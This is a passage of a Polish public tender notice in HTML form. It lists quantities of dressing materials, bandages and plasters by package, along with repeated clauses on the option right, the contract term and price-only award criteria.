foliowym. WYMAGANA JEST AKTUALNA KARTA TECHNICZNA OFEROWANEGO MATERIAŁU DO OFERTY.	opakowanie	120<br/>2	8	Tupfery z gazy bwełnianej 17 nitkowej, jałowe kule o średnicy 30 mm, po rozłożeniu ok. 30cm x30 cm , a&#39;10 sztuka.	opakowanie	200<br/>2	9	Wata bawełniana a&#39;200g	opakowanie	10<br/>2	10	Kompresy gazowe w rozmiarze 90x20cm 17nitek 6 warstwy o min. wykroju kompresu 90x120cm i min. gram. min.24,1g pakowane a 2szt., jałowe sterylizowane parą wodną .Zapakowane w torebkę papierowo-foliową z wycięciem na kciuk na opakowaniu centralna etykieta z dwoma naklejkami z m. in. nr serii, datą ważności, identyfikacją producenta służącą do wklejenia do dokumentacji. WYMAGANY DOKUMENT POTWIERDZAJĄCY METODĘ STERYLIZACJI PARĄ WODNĄ DO OFERTY.	opakowanie	500<br/>2	11	Opaska z waty syntetycznej w rolce 10cm x3 m	opakowanie	60 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">33141110-4 - Opatrunki</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Zamawiający zastosował prawo opcji o którym mowa w art. 441 ustawy Prawo zamówień publicznych. Oznacza to, iż podane w załączniku nr 1 i 2 ilości materiałów są maksymalnym szacunkowym zapotrzebowaniem na okres trwania umowy. Zamawiający zastrzega, że zamówieniem podstawowym objęte jest 90% zamówienia określonego w pakiecie, a pozostałe 10% objęte jest prawem opcji. Zamawiający wykorzysta 90% przedmiotu zamówienia określonego w pakiecie. Pozostałe 10 % Zamawiający wykorzysta w trakcie obowiązywania umowy, pod warunkiem zaistnienia zwiększonego zapotrzebowania na materiały opatrunkowe celem zapewnienia pacjentom właściwego leczenia w związku z rzeczywistymi potrzebami diagnostycznymi pacjentów Zamawiającego lub ze względu na zwiększony ruch pacjentów w jednostkach klinicznych. Z tytułu niewykorzystania pełnej ilości zamówienia nie przysługują Wykonawcy wobec Zamawiającego roszczenia odszkodowawcze. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Zamawiający dokona badania i oceny ofert. Każdy pakiet będzie oceniany oddzielnie. Wykonawca określi cenę na każdy pakiet oddzielnie w formularzu Oferta.<br/>2.	Ocenie będą podlegać oferty niepodlegające odrzuceniu.<br/>3.	Zamawiający wybiera najkorzystniejszą ofertę na podstawie kryteriów oceny ofert.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Pakiet nr	L.p.	Nazwa przedmiotu zamówienia:	J.miary.	Ilość zamawiana<br/>1	2	3	4	5<br/>3	1	Hydropolimerowy opatrunek piankowy (specjalna struktura porów warstwy chłonnej ma umożliwaiać szybkie odprowadzanie wydobywających się z rany wydzielin i szczątków komórek oraz ich zablokowanie w górnej warstwie opatrunku, wykazujacy się bardzo wysokim potencjałem retencyjnym ok 90 % wchłoniętych płynów musi pozostawać zatrzymane w strukturze opatrunku) 11 x 11 cm max.10 sztuk.	sztuka	80<br/>3	2	Hydropolimerowy opatrunek piankowy z samoprzylepną krawędzią mocującą (specjalna struktura porów warstwy chłonnej ma umożliwaiać szybkie odprowadzanie wydobywających się z rany wydzielin i szczątków komórek oraz ich zablokowanie w górnej warstwie opatrunku, wykazujacy się bardzo wysokim potencjałem retencyjnym ok 90 % wchłoniętych płynów musi pozostawać zatrzymane w strukturze opatrunku)ok 15 x 15 cm x ( +/-10%) max.5 sztuk.	sztuka	30<br/>3	3	Hydropolimerowy opatrunek piankowy (specjalna struktura porów warstwy chłonnej ma umożliwaiać szybkie odprowadzanie wydobywających się z rany wydzielin i szczątków komórek oraz ich zablokowanie w górnej warstwie opatrunku, wykazujacy się bardzo wysokim potencjałem retencyjnym ok 90 % wchłoniętych płynów musi pozostawać zatrzymane w strukturze opatrunku)ok.15 x 15 cm x max.5 sztuk.	sztuka	30<br/>3	4	Hydropolimerowy opatrunek piankowy do zaopatrywania tracheostomii (specjalna struktura porów warstwy chłonnej ma umożliwaiać szybkie odprowadzanie wydobywających się z rany wydzielin i szczątków komórek oraz ich zablokowanie w górnej warstwie opatrunku, wykazujacy się bardzo wysokim potencjałem retencyjnym ok 90 % wchłoniętych płynów musi pozostawać zatrzymane w strukturze opatrunku) 8 x 8 cm x max.10 sztuk.	sztuka	400<br/>3	5	Hydropolimerowy opatrunek piankowy z krawędzią samoprzylepną o specjalnie dostosowanym kształcie do zaopatrywania ran w okolicy krzyżowej, (specjalna struktura porów warstwy chłonnej ma umożliwaiać szybkie odprowadzanie wydobywających się z rany wydzielin i szczątków komórek oraz ich zablokowanie w górnej warstwie opatrunku, wykazujacy się bardzo wysokim potencjałem retencyjnym ok 90 % wchłoniętych płynów musi pozostawać zatrzymane w strukturze opatrunku) 18x 18 cm ( +/-10%) x max.3 sztuk.	sztuka	30<br/>3	6	Hydropolimerowy opatrunek piankowy z krawędzią samoprzylepną o specjalnie dostosowanym ksztukaałcie do zaopatrywania ran na łokciach i piętach (specjalna struktura porów warstwy chłonnej ma umożliwaiać szybkie odprowadzanie wydobywających się z rany wydzielin i szczątków komórek oraz ich zablokowanie w górnej warstwie opatrunku, wykazujacy się bardzo wysokim potencjałem retencyjnym ok 90 % wchłoniętych płynów musi pozostawać zatrzymane w strukturze opatrunku) 16,5 x 18 cm x 3 sztuka.	sztuka	30<br/>3	7	Opatrunek z włókien alginianów wapnia, które w kontakcie z solami sodowymi jakie występują we krwi i w wydzielinach z ran przeksztukaałcą się w substancję żelową, stwarzjącą dobre warunki do gojenia się ran, tamponada 2 g/30 cm x 5 sztuka.	sztuka	30<br/>3	8	Opatrunek z włókien alginianów wapnia, które w kontakcie z solami sodowymi jakie występują we krwi i w wydzielinach z ran przeksztukaałcą się w substancję żelową, stwarzjącą dobre warunki do gojenia się ran, kompres o rozm.10 cm x10 cm a&#39; max.10 sztuk.	sztuka	80<br/>3	9	Opatrunek z włókien alginianów wapnia, które w kontakcie z solami sodowymi jakie występują we krwi i w wydzielinach z ran przeksztukaałcą się w substancję żelową, stwarzjącą dobre warunki do gojenia się ran, kompres o rozm. 5 cm x5 cm (+/-10%) a&#39; max.10 sztuk.	sztuka	50<br/>3	10	Samoprzylepny opatrunek hydrokoloidowy, który pod wpływem wydzieliny z rany powoduje powstanie żelu, zapewniającego utrzymanie wilgotnego środowiska w obrębie rany. Zewnętrzna powłoka opatrunku musi być nieprzepuszczalna dla drobnoustrojów, rozmiar 7,5 x 7,5 cm x max.10 sztuk.	sztuka	60<br/>3	11	Kompres (z siatki bawełnianej impregnowany neutralną maścią, nie zawierający czynników czynnych i uczulających, zapewniający dobrą wentylację i utlenienie rany) 7,5 x 10 cm ( +/-10%) x max.50 sztuk.	sztuka	200<br/>3	12	Kompres (z siatki bawełnianej impregnowany neutralną maścią, nie zawierający czynników czynnych i uczulających, zapewniający dobrą wentylację i utlenienie rany) ok.10 x 10 cm ( +/-10%) x max.10 sztuk.	sztuka	100<br/>3	13	Kompres (z siatki bawełnianej impregnowany neutralną maścią, nie zawierający czynników czynnych i uczulających, zapewniający dobrą wentylację i utlenienie rany) 10 x 20 cm x max.30 sztuk.	sztuka	900<br/>3	14	&#34;Opatrunek jałowy do zaopatrywania ran silnie sączących oraz w celu ich wyściełania.Opatrunek chłonny zbudowany z 4 warstw materiałów o różnych właściwościach;<br/>Warstwa chłonna z miękkiej rozwłók­nionej celulozy ma dobre właściwości<br/>absorpcyjne i wyściełające; Rozmiar 10 x20cm&#34;	sztuka	500<br/>3	15	&#34;Opatrunek jałowy do zaopatrywania ran silnie sączących oraz w celu ich wyściełania.Opatrunek chłonny zbudowany z 4 warstw materiałów o różnych właściwościach;<br/>Warstwa chłonna z miękkiej rozwłók­nionej celulozy ma dobre właściwości<br/>absorpcyjne i wyściełające; Rozmiar 20x20cm&#34;	sztuka	300<br/>3	16	Jałowy przezroczysty opatrunek hydrożelowy z krawędzią samoprzylepną oraz podziałką umożliwiającą ocenę wielkości rany o rozm. 7,5 cm x 10 cm ( +/-10%) a&#39; max.5 sztuk.	sztuka	50<br/>3	17	Jałowy przezroczysty opatrunek hydrożelowy z krawędzią samoprzylepną oraz podziałką umożliwiającą ocenę wielkości rany o rozm.12,5 cm x 12,5 cm ( +/-10%) a&#39; max.5 sztuk.	sztuka	50<br/>3	18	Jałowy przezroczysty opatrunek hydrożelowy bez krawędzi samoprzylepnej, z podziałką umożliwiającą ocenę wielkości rany o rozm.10 cm x 10 cm ( +/-10%) a&#39; max.5 sztuk.	sztuka	50<br/>3	19	Hydroaktywny opatrunek piankowy z hydrożelem bez krawędzi samoprzylepnej10 x10cm x max.10 sztuk	sztuka	100<br/>3	20	Amorficzny przezroczysty hydrożel do wilgotnej terapii ran chronicznych, w dozowniku w formie strzykawki z podwójną podziałką, a&#39;15g	sztuka	100<br/>3	21	Opatrunek dla ran głębokich wymagających aktywnego oczyszczenia,zbudowany z warstwy chłonnej zawierającej superabsorbent polimerowy oraz substancję antybakteryjną biguanid poliheksametylenowy i roztwór Ringera , zapewniający zmianę opatrunku raz na 3 doby.Rozmiar 7,5 x7,5cm	sztuka	20<br/>3	22	Wielowarstwowy opatrunek dla ran wymagających aktywnego oczyszczania zbudowany z 3 warstw : 1. warstwy zew. wodoszczelnej, 2. warstwy chłonnej zawierającej superabsorbent polimerowy oraz substancję antybakteryjną biguanid poliheksametylenowy i roztwór Ringera, 3. warstwy kontaktowej , nieprzywierajacej posiadajacej silikonowe paski, zapewniający możliwość zmiany opatrunku raz na 3 doby ) 7,5 x 7,5 cm op. a&#39;max.10 sztuk.	sztuka	20<br/>3	23	Wielowarstwowy opatrunek dla ran wymagających aktywnego oczyszczania zbudowany z 3 warstw : 1. warstwy zew. wodoszczelnej, 2. warstwy chłonnej zawierającej superabsorbent polimerowy oraz substancję antybakteryjną biguanid poliheksametylenowy i roztwór Ringera, 3. warstwy kontaktowej , nieprzywierajacej posiadajacej silikonowe paski, zapewniający możliwość zmiany opatrunku raz na 3 doby ) 10 x 10 cm op. a&#39;max.10 sztuk.	sztuka	20 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">33141110-4 - Opatrunki</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Zamawiający zastosował prawo opcji o którym mowa w art. 441 ustawy Prawo zamówień publicznych. Oznacza to, iż podane w załączniku nr 1 i 2 ilości materiałów są maksymalnym szacunkowym zapotrzebowaniem na okres trwania umowy. Zamawiający zastrzega, że zamówieniem podstawowym objęte jest 90% zamówienia określonego w pakiecie, a pozostałe 10% objęte jest prawem opcji. Zamawiający wykorzysta 90% przedmiotu zamówienia określonego w pakiecie. Pozostałe 10 % Zamawiający wykorzysta w trakcie obowiązywania umowy, pod warunkiem zaistnienia zwiększonego zapotrzebowania na materiały opatrunkowe celem zapewnienia pacjentom właściwego leczenia w związku z rzeczywistymi potrzebami diagnostycznymi pacjentów Zamawiającego lub ze względu na zwiększony ruch pacjentów w jednostkach klinicznych. Z tytułu niewykorzystania pełnej ilości zamówienia nie przysługują Wykonawcy wobec Zamawiającego roszczenia odszkodowawcze. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Zamawiający dokona badania i oceny ofert. Każdy pakiet będzie oceniany oddzielnie. Wykonawca określi cenę na każdy pakiet oddzielnie w formularzu Oferta.<br/>2.	Ocenie będą podlegać oferty niepodlegające odrzuceniu.<br/>3.	Zamawiający wybiera najkorzystniejszą ofertę na podstawie kryteriów oceny ofert.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Pakiet nr	L.p.	Nazwa przedmiotu zamówienia:	J.miary.	Ilość zamawiana<br/>1	2	3	4	5<br/>4	1	Nieprzywierający opatrunek, nasączony miodem Manuka o rozm. 5cm x 5cm (+/- 1cm),a&#39; max.5 sztuk	sztuka	100<br/>4	2	Nieprzywierający opatrunek, nasączony miodem Manuka o rozm. 10cm x 10cm (+/- 1cm),a&#39; max.5 sztuk	sztuka	120<br/>4	3	Alginianowy, absorpcyjny, nieprzylegający opatrunek z miodem Manuka o rozm. 5cm x 5cm (+/- 1cm),a&#39; max.5 sztuk	sztuka	120<br/>4	4	Alginianowy, absorpcyjny, nieprzylegający opatrunek z miodem Manuka o rozm. 10cm x 10cm (+/- 1cm),a&#39; max.5 sztuk	sztuka	160<br/>4	5	Siatkowy, nieprzylegający opatrunek nasączony miodem Manuka o rozm. 10cm x 10cm (+/- 1cm),a&#39; max.10 sztuk	sztuka	300<br/>4	6	Siatkowy, nieprzylegający opatrunek nasączony miodem Manuka o rozm. 10cm x 20cm (+/- 1cm),a&#39; max.10 sztuk	sztuka	250<br/>4	7	Miód Manuka w tubce, 25 g (+/-2g)	sztuka	50 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">33141110-4 - Opatrunki</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Zamawiający zastosował prawo opcji o którym mowa w art. 441 ustawy Prawo zamówień publicznych. Oznacza to, iż podane w załączniku nr 1 i 2 ilości materiałów są maksymalnym szacunkowym zapotrzebowaniem na okres trwania umowy. Zamawiający zastrzega, że zamówieniem podstawowym objęte jest 90% zamówienia określonego w pakiecie, a pozostałe 10% objęte jest prawem opcji. Zamawiający wykorzysta 90% przedmiotu zamówienia określonego w pakiecie. Pozostałe 10 % Zamawiający wykorzysta w trakcie obowiązywania umowy, pod warunkiem zaistnienia zwiększonego zapotrzebowania na materiały opatrunkowe celem zapewnienia pacjentom właściwego leczenia w związku z rzeczywistymi potrzebami diagnostycznymi pacjentów Zamawiającego lub ze względu na zwiększony ruch pacjentów w jednostkach klinicznych. Z tytułu niewykorzystania pełnej ilości zamówienia nie przysługują Wykonawcy wobec Zamawiającego roszczenia odszkodowawcze. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Zamawiający dokona badania i oceny ofert. Każdy pakiet będzie oceniany oddzielnie. Wykonawca określi cenę na każdy pakiet oddzielnie w formularzu Oferta.<br/>2.	Ocenie będą podlegać oferty niepodlegające odrzuceniu.<br/>3.	Zamawiający wybiera najkorzystniejszą ofertę na podstawie kryteriów oceny ofert.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 5</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Pakiet nr	L.p.	Nazwa przedmiotu zamówienia:	J.miary.	Ilość zamawiana<br/>1	2	3	4	5<br/>5	1	Miejscowo działajacy środek hemostatyczny, format gąbka, rozm. 7 x5 x 0,1cm sztuka	400 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">33141110-4 - Opatrunki</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Zamawiający zastosował prawo opcji o którym mowa w art. 441 ustawy Prawo zamówień publicznych. Oznacza to, iż podane w załączniku nr 1 i 2 ilości materiałów są maksymalnym szacunkowym zapotrzebowaniem na okres trwania umowy. Zamawiający zastrzega, że zamówieniem podstawowym objęte jest 90% zamówienia określonego w pakiecie, a pozostałe 10% objęte jest prawem opcji. Zamawiający wykorzysta 90% przedmiotu zamówienia określonego w pakiecie. Pozostałe 10 % Zamawiający wykorzysta w trakcie obowiązywania umowy, pod warunkiem zaistnienia zwiększonego zapotrzebowania na materiały opatrunkowe celem zapewnienia pacjentom właściwego leczenia w związku z rzeczywistymi potrzebami diagnostycznymi pacjentów Zamawiającego lub ze względu na zwiększony ruch pacjentów w jednostkach klinicznych. Z tytułu niewykorzystania pełnej ilości zamówienia nie przysługują Wykonawcy wobec Zamawiającego roszczenia odszkodowawcze. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Zamawiający dokona badania i oceny ofert. Każdy pakiet będzie oceniany oddzielnie. Wykonawca określi cenę na każdy pakiet oddzielnie w formularzu Oferta.<br/>2.	Ocenie będą podlegać oferty niepodlegające odrzuceniu.<br/>3.	Zamawiający wybiera najkorzystniejszą ofertę na podstawie kryteriów oceny ofert.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 6</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Pakiet nr	L.p.	Nazwa przedmiotu zamówienia:	J.miary.	Ilość zamawiana<br/>1	2	3	4	5<br/>6	1	Opaska wiskozowa dziana podtrzymująca , pakowana pojedynczo, ok. 5 cm x 4 m	sztuka	100<br/>6	2	Opaska wiskozowa dziana podtrzymująca, pakowana pojedynczo ok. 10 cm x 4 m	sztuka	900<br/>6	3	Opaska wiskozowa dziana podtrzymująca, pakowana pojedynczo,ok. 15 cm x 4 m	sztuka	1300<br/>6	4	Opaska elastyczna tkana z zapinką , pakowana pojedynczo w kartoniku, ok. 12 cm x 5 m	sztuka	100<br/>6	5	Opaska elastyczna tkana z dwoma zapinkami pakowana pojedynczo w kartoniku ok. 15 cm x 5 m	sztuka	100<br/>6	6	Elastyczny rękaw opatrunkowy na dłoń, o zawartości bawełny min. 50% opakowania max 25m	opk	30<br/>6	7	Elastyczny rękaw opatrunkowy na nogę, o zawartości bawełny min. 50% opakowanie max 25m	opk	150<br/>6	8	Elastyczny rękaw opatrunkowy na głowę, udo dorosłego, o zawartości bawełny min. 50% opakowanie max 25m	opk	50<br/>6	9	Elastyczny rękaw opatrunkowy na tułów dorosłego, o zawartości bawełny min. 50% opakowanie max 25m	opk	20 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">33141110-4 - Opatrunki</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Zamawiający zastosował prawo opcji o którym mowa w art. 441 ustawy Prawo zamówień publicznych. Oznacza to, iż podane w załączniku nr 1 i 2 ilości materiałów są maksymalnym szacunkowym zapotrzebowaniem na okres trwania umowy. Zamawiający zastrzega, że zamówieniem podstawowym objęte jest 90% zamówienia określonego w pakiecie, a pozostałe 10% objęte jest prawem opcji. Zamawiający wykorzysta 90% przedmiotu zamówienia określonego w pakiecie. Pozostałe 10 % Zamawiający wykorzysta w trakcie obowiązywania umowy, pod warunkiem zaistnienia zwiększonego zapotrzebowania na materiały opatrunkowe celem zapewnienia pacjentom właściwego leczenia w związku z rzeczywistymi potrzebami diagnostycznymi pacjentów Zamawiającego lub ze względu na zwiększony ruch pacjentów w jednostkach klinicznych. Z tytułu niewykorzystania pełnej ilości zamówienia nie przysługują Wykonawcy wobec Zamawiającego roszczenia odszkodowawcze. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Zamawiający dokona badania i oceny ofert. Każdy pakiet będzie oceniany oddzielnie. Wykonawca określi cenę na każdy pakiet oddzielnie w formularzu Oferta.<br/>2.	Ocenie będą podlegać oferty niepodlegające odrzuceniu.<br/>3.	Zamawiający wybiera najkorzystniejszą ofertę na podstawie kryteriów oceny ofert.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 7</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Pakiet nr	L.p.	Nazwa przedmiotu zamówienia:	J.miary.	Ilość zamawiana<br/>1	2	3	4	5<br/>7	1	Hypoalergiczny przylepiec z miękkiej włókniny przepuszczalnej dla pary wodnej i powietrza, z opatrunkiem o wym. 6 cm x 5 m	opakowanie	30<br/>7	2	Hypoalergiczny przylepiec z miękkiej włókniny przepuszczalnej dla pary wodnej i powietrza, z opatrunkiem o wym. 8 cm x 5 m opakowanie	30<br/>7	3	Hypoalergiczny przylepiec na tkaninie z opatrunkiem o wym. 8 cm x 5 m opakowanie	10<br/>7	4	Hipoalergiczny plaster do opatrywania skóry po wykonanych nakłuciach,zaopatrywania drobnych zranien. Rozmiar 4 x 1,6 cm	sztuka	12500<br/>7	5	Jałowy opatrunek samoprzylepny na ranę z wkładem chłonnym zabezpieczonym mikrosiatka, o zaokraglonych rogach i orzecięciem papierui wzdłuz krótszego boku o rozmiarze 7,2cm x5 cm	sztuka	750<br/>7	6	Jałowy opatrunek samoprzylepny na ranę z wkładem chłonnym zabezpieczonym mikrosiatka, o zaokraglonych rogach i orzecięciem papierui wzdłuz krótszego boku o rozmiarze 20 cm x 10cm	sztuka	500<br/>7	7	Jałowy opatrunek samoprzylepny na ranę z wkładem chłonnym zabezpieczonym mikrosiatka, o zaokraglonych rogach i orzecięciem papierui wzdłuz krótszego boku o rozmiarze 25cm x 10cm	sztuka	200<br/>7	8	Włókninowy przylepiec chirurgiczny o wym. ok. 5 cm x 10 m	sztuka	40<br/>7	9	Włókninowy przylepiec chirurgiczny o wym. ok. 10 cm x 10 m	sztuka	50<br/>7	10	Włókninowy przylepiec chirurgiczny o wym. ok. 20 cm x 10 m	sztuka	30<br/>7	11	Jałowy przylepiec włókninowy do kaniul, z nacięciem, dodatkową poduszeczką ok i zaokrąglonych rogach, o wym. 6 cm x 8 cm x max.50 sztuk.	sztuka	750<br/>7	12	Jałowy samoprzylepny opatrunek do mocowania kaniul z folii poliuretanowej z wcięciem dodatkowo wzmocniony włókniną o zaokrąglonych rogach , o wym. 7 cm x 9 cm x max.50 sztuk.	sztuka	15000 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">33141110-4 - Opatrunki</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Zamawiający zastosował prawo opcji o którym mowa w art. 441 ustawy Prawo zamówień publicznych. Oznacza to, iż podane w załączniku nr 1 i 2 ilości materiałów są maksymalnym szacunkowym zapotrzebowaniem na okres trwania umowy. Zamawiający zastrzega, że zamówieniem podstawowym objęte jest 90% zamówienia określonego w pakiecie, a pozostałe 10% objęte jest prawem opcji. Zamawiający wykorzysta 90% przedmiotu zamówienia określonego w pakiecie. Pozostałe 10 % Zamawiający wykorzysta w trakcie obowiązywania umowy, pod warunkiem zaistnienia zwiększonego zapotrzebowania na materiały opatrunkowe celem zapewnienia pacjentom właściwego leczenia w związku z rzeczywistymi potrzebami diagnostycznymi pacjentów Zamawiającego lub ze względu na zwiększony ruch pacjentów w jednostkach klinicznych. Z tytułu niewykorzystania pełnej ilości zamówienia nie przysługują Wykonawcy wobec Zamawiającego roszczenia odszkodowawcze. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Zamawiający dokona badania i oceny ofert. Każdy pakiet będzie oceniany oddzielnie. Wykonawca określi cenę na każdy pakiet oddzielnie w formularzu Oferta.<br/>2.	Ocenie będą podlegać oferty niepodlegające odrzuceniu.<br/>3.	Zamawiający wybiera najkorzystniejszą ofertę na podstawie kryteriów oceny ofert.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) 